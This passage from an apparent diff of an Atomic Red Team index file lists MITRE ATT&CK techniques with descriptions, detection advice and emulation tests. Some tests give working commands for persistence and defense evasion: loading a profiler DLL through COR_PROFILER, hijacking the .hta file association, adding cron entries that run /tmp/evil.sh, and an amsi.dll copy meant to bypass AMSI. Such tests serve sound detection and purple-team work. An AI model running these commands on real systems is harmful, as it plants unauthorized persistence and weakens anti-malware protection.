+ + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unamanged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + $env:COR_ENABLE_PROFILING = 1 + $env:COR_PROFILER = '#{clsid_guid}' + $env:COR_PROFILER_PATH = '#{file_name}' + POWERSHELL -c 'Start-Sleep 1' + cleanup_command: | + $env:COR_ENABLE_PROFILING = 0 + $env:COR_PROFILER = '' + $env:COR_PROFILER_PATH = '' + name: powershell + T1546.001: + technique: + created: '2020-01-24T13:40:47.282Z' + modified: '2020-01-24T13:40:47.282Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c + description: "Adversaries may establish persistence by executing malicious content + triggered by a file type association. When a file is opened, the default program + used to open the file (also called the file association or handler) is checked. + File association selections are stored in the Windows Registry and can be + edited by users, administrators, or programs that have Registry access (Citation: + Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or + by administrators using the built-in assoc utility. 
(Citation: Microsoft Assoc + Oct 2017) Applications can modify the file association for a given file extension + to call an arbitrary program when a file with the given extension is opened.\n\nSystem + file associations are listed under HKEY_CLASSES_ROOT\\.[extension], + for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler + for that extension located at HKEY_CLASSES_ROOT\\[handler]. The + various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. + For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* + HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe + values of the keys listed are commands that are executed when the handler + opens the file extension. Adversaries can modify these values to continually + execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)" + name: Change Default File Association + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.001 + url: https://attack.mitre.org/techniques/T1546/001 + - external_id: CAPEC-556 + source_name: capec + url: https://capec.mitre.org/data/definitions/556.html + - url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs + description: Microsoft. (n.d.). Change which programs Windows 7 uses by default. + Retrieved July 26, 2016. + source_name: Microsoft Change Default Programs + - url: http://msdn.microsoft.com/en-us/library/bb166549.aspx + description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. + Retrieved November 13, 2014. + source_name: Microsoft File Handlers + - url: https://docs.microsoft.com/windows-server/administration/windows-commands/assoc + description: Plett, C. et al.. (2017, October 15). assoc. 
Retrieved August + 7, 2018. + source_name: Microsoft Assoc Oct 2017 + - url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd + description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August + 8, 2018. + source_name: TrendMicro TROJ-FAKEAV OCT 2012 + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_detection: |- + Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. + + User file association preferences are stored under [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys. + + Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1546.001 + atomic_tests: + - name: Change Default File Association + auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 + description: "Change Default File Association From cmd.exe of hta to notepad.\n\nUpon + successful execution, cmd.exe will change the file association of .hta to + notepad.exe. 
\n" + supported_platforms: + - windows + input_arguments: + target_extension_handler: + description: txtfile maps to notepad.exe + type: Path + default: txtfile + extension_to_change: + description: File Extension To Hijack + type: String + default: ".hta" + original_extension_handler: + description: File Extension To Revert + type: String + default: htafile + executor: + command: 'assoc #{extension_to_change}=#{target_extension_handler} + +' + cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} + +' + name: command_prompt + elevation_required: true + T1078.004: + technique: + id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 + description: |- + Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) + + Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. 
+ name: Cloud Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.004 + url: https://attack.mitre.org/techniques/T1078/004 + - source_name: AWS Identity Federation + url: https://aws.amazon.com/identity/federation/ + description: Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, + 2020. + - source_name: Google Federating GC + url: https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction + description: Google. (n.d.). Federating Google Cloud with Active Directory. + Retrieved March 13, 2020. + - source_name: Microsoft Deploying AD Federation + url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs + description: Microsoft. (n.d.). Deploying Active Directory Federation Services + in Azure. Retrieved March 13, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-03-16T12:45:15.399Z' + created: '2020-03-13T20:36:57.378Z' + x_mitre_platforms: + - Azure AD + - Office 365 + - SaaS + - IaaS + - Google Workspace + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal + or malicious behavior, such as accessing information outside of the normal + function of the account or account usage at atypical hours. 
+ x_mitre_permissions_required: + - User + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.2' + atomic_tests: [] + T1546.015: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.015 + url: https://attack.mitre.org/techniques/T1546/015 + - url: https://msdn.microsoft.com/library/ms694363.aspx + description: Microsoft. (n.d.). The Component Object Model. Retrieved August + 18, 2016. + source_name: Microsoft Component Object Model + - url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence + description: 'G DATA. (2014, October). COM Object hijacking: the discreet + way of persistence. Retrieved August 13, 2016.' + source_name: GDATA COM Hijacking + - source_name: Elastic COM Hijacking + description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting + Persistence & Evasion with the COM. Retrieved September 15, 2016.' + url: https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Component Object Model Hijacking + description: "Adversaries may establish persistence by executing malicious content + triggered by hijacked references to Component Object Model (COM) objects. + COM is a system within Windows to enable interaction between software components + through the operating system.(Citation: Microsoft Component Object Model) + \ References to various COM objects are stored in the Registry. \n\nAdversaries + can use the COM system to insert malicious code that can be executed in place + of legitimate software through hijacking the COM references and relationships + as a means for persistence. Hijacking a COM object requires a change in the + Registry to replace a reference to a legitimate system component which may + cause that component to not work when executed. 
When that system component + is executed through normal system operation the adversary's code will be executed + instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects + that are used frequently enough to maintain a consistent level of persistence, + but are unlikely to break noticeable functionality within the system as to + avoid system instability that could lead to detection. " + id: attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:19:44.750Z' + created: '2020-03-16T14:12:47.923Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: "There are opportunities to detect COM hijacking by searching + for Registry references that have been replaced and through Registry operations + (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary + paths with unknown paths or otherwise malicious content. Even though some + third-party applications define user COM objects, the presence of objects + within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and + should be investigated since user objects will be loaded prior to machine + objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Elastic + COM Hijacking) Registry entries for existing COM objects may change infrequently. + When an entry with a known good path and binary is replaced or changed to + an unusual value to point to an unknown binary in a new location, then it + may indicate suspicious behavior and should be investigated. \n\nLikewise, + if software DLL loads are collected and analyzed, any unusual DLL load that + can be correlated with a COM object Registry modification may indicate COM + hijacking has been performed. 
" + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_contributors: + - Elastic + x_mitre_platforms: + - Windows + atomic_tests: [] + T1053.007: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.007 + url: https://attack.mitre.org/techniques/T1053/007 + - source_name: Kubernetes Jobs + url: https://kubernetes.io/docs/concepts/workloads/controllers/job/ + description: The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March + 30, 2021. + - source_name: Kubernetes CronJob + url: https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ + description: The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved + March 29, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Container Orchestration Job + description: |- + Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. 
+ + In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in the cluster.(Citation: Threat Matrix for Kubernetes) + id: attack-pattern--1126cab1-c700-412f-a510-61f4937bb096 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-12T18:09:46.821Z' + created: '2021-03-29T17:06:22.247Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: 'Monitor for the anomalous creation of scheduled jobs in + container orchestration environments. Use logging agents on Kubernetes nodes + and retrieve logs from sidecar proxies for application and resource pods to + monitor malicious container orchestration job deployments. ' + x_mitre_contributors: + - Center for Threat-Informed Defense (CTID) + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Container: Container Creation' + - 'File: File Creation' + identifier: T1053.007 + atomic_tests: + - name: ListCronjobs + auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. 
+ +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl get cronjobs -n #{namespace} + +' + name: bash + elevation_required: false + - name: CreateCronjob + auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl create -f src/cronjob.yaml -n #{namespace} + +' + cleanup_command: 'kubectl delete cronjob art -n #{namespace} + +' + name: bash + elevation_required: false + T1134.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1134.002 + url: https://attack.mitre.org/techniques/T1134/002 + - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing + description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved + April 21, 2017. + source_name: Microsoft Command-line Logging + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Create Process with Token + description: Adversaries may create a new process with a duplicated token to + escalate privileges and bypass access controls. 
An adversary can duplicate + a desired access token with DuplicateToken(Ex) and use it with + CreateProcessWithTokenW to create a new process running under + the security context of the impersonated user. This is useful for creating + a new process under the security context of a different user. + id: attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-26T21:28:19.476Z' + created: '2020-02-18T16:48:56.582Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_defense_bypassed: + - Windows User Account Control + - System access controls + - File system access controls + x_mitre_detection: |- + If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) + + If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. + + Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. 
+ x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Command: Command Execution' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1543: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543 + url: https://attack.mitre.org/techniques/T1543 + - url: https://technet.microsoft.com/en-us/library/cc772408.aspx + description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. + source_name: TechNet Services + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Create or Modify System Process + description: "Adversaries may create or modify system-level processes to repeatedly + execute malicious payloads as part of persistence. When operating systems + boot up, they can start processes that perform background system functions. + On Windows and Linux, these system processes are referred to as services. + (Citation: TechNet Services) On macOS, launchd processes known as [Launch + Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) + are run to finish system initialization and load user specific parameters.(Citation: + AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, + daemons, or agents that can be configured to execute at startup or a repeatable + interval in order to establish persistence. 
Similarly, adversaries may modify + existing services, daemons, or agents to achieve the same effect. \n\nServices, + daemons, or agents may be created with administrator privileges but executed + under root/SYSTEM privileges. Adversaries may leverage this functionality + to create or modify system processes in order to escalate privileges. (Citation: + OSX Malware Detection). " + id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T13:46:29.922Z' + created: '2020-01-10T16:03:18.865Z' + x_mitre_data_sources: + - 'Service: Service Creation' + - 'Service: Service Modification' + - 'Process: Process Creation' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_detection: "Monitor for changes to system processes that do not correlate + with known software, patch cycles, etc., including by comparing results against + a trusted system baseline. New, benign system processes may be created during + installation of new software. Data and events should not be viewed in isolation, + but as part of a chain of behavior that could lead to other activities, such + as network connections made for Command and Control, learning details about + the environment through Discovery, and Lateral Movement. \n\nCommand-line + invocation of tools capable of modifying services may be unusual, depending + on how systems are typically used in a particular environment. Look for abnormal + process call trees from known services and for execution of other commands + that could relate to Discovery or other adversary techniques. 
\n\nMonitor + for changes to files associated with system-level processes." + x_mitre_platforms: + - Windows + - macOS + - Linux + atomic_tests: [] + T1053.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.003 + url: https://attack.mitre.org/techniques/T1053/003 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Cron + description: |- + Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. + + An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. + id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T23:30:46.546Z' + created: '2019-12-03T14:25:00.538Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: false + x_mitre_permissions_required: + - User + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. 
\n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement. " + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - Linux + - macOS + identifier: T1053.003 + atomic_tests: + - name: Cron - Replace crontab with referenced file + auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 + description: 'This test replaces the current user''s crontab file with the contents + of the referenced file. This technique was used by numerous IoT automated + exploitation attacks. + +' + supported_platforms: + - macos + - linux + input_arguments: + command: + description: Command to execute + type: string + default: "/tmp/evil.sh" + tmp_cron: + description: Temporary reference file to hold evil cron schedule + type: path + default: "/tmp/persistevil" + executor: + name: bash + command: | + crontab -l > /tmp/notevil + echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} + cleanup_command: 'crontab /tmp/notevil + +' + - name: Cron - Add script to all cron subfolders + auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 + description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, + /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a + schedule. This technique was used by the threat actor Rocke during the exploitation + of Linux web servers. 
+ +' + supported_platforms: + - macos + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: | + echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} + cleanup_command: | + rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: 'This test adds a script to a /var/spool/cron/crontabs folder configured + to execute on a schedule. This technique was used by the threat actor Rocke + during the exploitation of Linux web servers. + +' + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + +' + cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} + +' + T1574.001: + technique: + id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 + description: |- + Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. 
(Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. + + There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) + + Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) + + If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. 
+ name: DLL Search Order Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.001 + url: https://attack.mitre.org/techniques/T1574/001 + - external_id: CAPEC-471 + source_name: capec + url: https://capec.mitre.org/data/definitions/471.html + - source_name: Microsoft Dynamic Link Library Search Order + url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Dynamic-Link Library Search Order. + Retrieved November 30, 2014. + - source_name: FireEye Hijacking July 2010 + url: https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html + description: Harbour, N. (2010, July 15). Malware Persistence without the + Windows Registry. Retrieved November 17, 2020. + - source_name: OWASP Binary Planting + description: OWASP. (2013, January 30). Binary planting. Retrieved June 7, + 2016. + url: https://www.owasp.org/index.php/Binary_planting + - source_name: FireEye fxsst June 2011 + url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html + description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November + 17, 2020. + - source_name: Microsoft Security Advisory 2269637 + url: https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 + description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved + March 13, 2020. + - source_name: Microsoft Dynamic-Link Library Redirection + url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Dynamic-Link Library Redirection. + Retrieved March 13, 2020. + - source_name: Microsoft Manifests + description: Microsoft. (n.d.). Manifests. Retrieved December 5, 2014. 
+ url: https://msdn.microsoft.com/en-US/library/aa375365 + - source_name: FireEye DLL Search Order Hijacking + url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html + description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking + Revisited. Retrieved March 13, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-26T18:37:03.748Z' + created: '2020-03-13T18:11:08.357Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_detection: Monitor file systems for moving, renaming, replacing, or + modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared + with past behavior) that do not correlate with known software, patches, etc., + are suspicious. Monitor DLLs loaded into a process and detect DLLs that have + the same file name but abnormal paths. Modifications to or creation of `.manifest` + and `.local` redirection files that do not correlate with software updates + are suspicious. + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1574.001 + atomic_tests: + - name: DLL Search Order Hijacking - amsi.dll + auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 + description: | + Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) + https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ + + Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. 
+ supported_platforms: + - windows + executor: + command: | + copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe + copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll + %APPDATA%\updater.exe -Command exit + cleanup_command: | + del %APPDATA%\updater.exe >nul 2>&1 + del %APPDATA%\amsi.dll >nul 2>&1 + name: command_prompt + elevation_required: true + T1574.002: + technique: + created: '2020-03-13T19:41:37.908Z' + modified: '2021-04-26T18:31:34.954Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1574.002 + url: https://attack.mitre.org/techniques/T1574/002 + - external_id: CAPEC-641 + source_name: capec + url: https://capec.mitre.org/data/definitions/641.html + - source_name: FireEye DLL Side-Loading + url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf + description: 'Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in + the Side of the Anti-Virus Industry. Retrieved March 13, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: DLL Side-Loading + description: |- + Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their 